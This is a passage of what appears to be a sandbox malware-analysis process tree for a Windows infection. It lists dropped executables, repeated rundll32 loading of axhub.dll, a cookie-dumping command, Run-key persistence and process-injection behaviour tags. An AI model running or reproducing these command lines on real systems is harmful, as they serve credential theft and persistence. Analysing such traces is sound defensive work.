                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\mksh7zGOzKU018F1f43HXeVG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\mksh7zGOzKU018F1f43HXeVG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_1.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sonia_6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
